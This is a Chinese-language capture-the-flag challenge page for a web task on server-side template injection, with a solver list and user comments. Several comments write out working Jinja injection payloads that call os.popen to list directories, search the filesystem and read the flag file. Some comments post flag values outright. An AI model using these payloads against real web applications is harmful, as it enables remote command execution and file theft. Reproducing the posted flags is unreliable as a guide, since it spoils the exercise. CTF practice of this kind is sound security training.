Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
15928
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
HK1ng 攻破了该题 10小时前
sun_space 攻破了该题 13小时前
ct1640 攻破了该题 1天前
zypts 攻破了该题 2天前
288728 攻破了该题 4天前
看writeup刷题 攻破了该题 5天前
冯123456 攻破了该题 6天前
小城阿扬 攻破了该题 7天前
smtall 攻破了该题 9天前
3028545694 攻破了该题 10天前
15248665739 攻破了该题 11天前
Zzz0529 攻破了该题 12天前
炸鱼饼 攻破了该题 13天前
怀抱晚安 攻破了该题 13天前
tingsi464 攻破了该题 14天前
nina123 攻破了该题 16天前
33538626867 攻破了该题 16天前
qgys 攻破了该题 17天前
19189756057 攻破了该题 18天前
评论
ssln 1年前
举报
114.67.175.224:12792/?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 看不懂,应该是什么固定格式,修改“ls”即可执行命令
210470qq 1年前
举报
flag{43b52fa732d6f8ccbfacea9e989ac07b}
songci 1年前
举报
ssti模板注入,尝试获取OS module进行命令执行或文件读取,使用init.globals来看看有没有os module或者其他的可以读写文件的,爆破获取300存在:{{"".__class__.__mro__[1].__subclasses__()[300].__init__.__globals__}},进行命令执行获取flag:?flag={{""
Mirabelle 1年前
举报
?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}; ?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
ZeronKR1212 1年前
举报
怎么做啊,哥哥们
kimizu 1年前
举报
SSTI模板注入,先尝试搜索有没有flag文件,发现有,cat以下就行 {{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
3347665154 1年前
举报
flag{a0a8ab35c083003f4bb44c7920b69bd1}
jinyuxin 1年前
举报
flag{3da091678f181776084413b87192ea57}
kylin 1年前
举报
flag{b433fd309dca8ad2f3f48656e6c0f548}
Clumsy 1年前
举报
flag{fccecffd6c3b833b580dce1d68f23037} 解决方案:/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}%20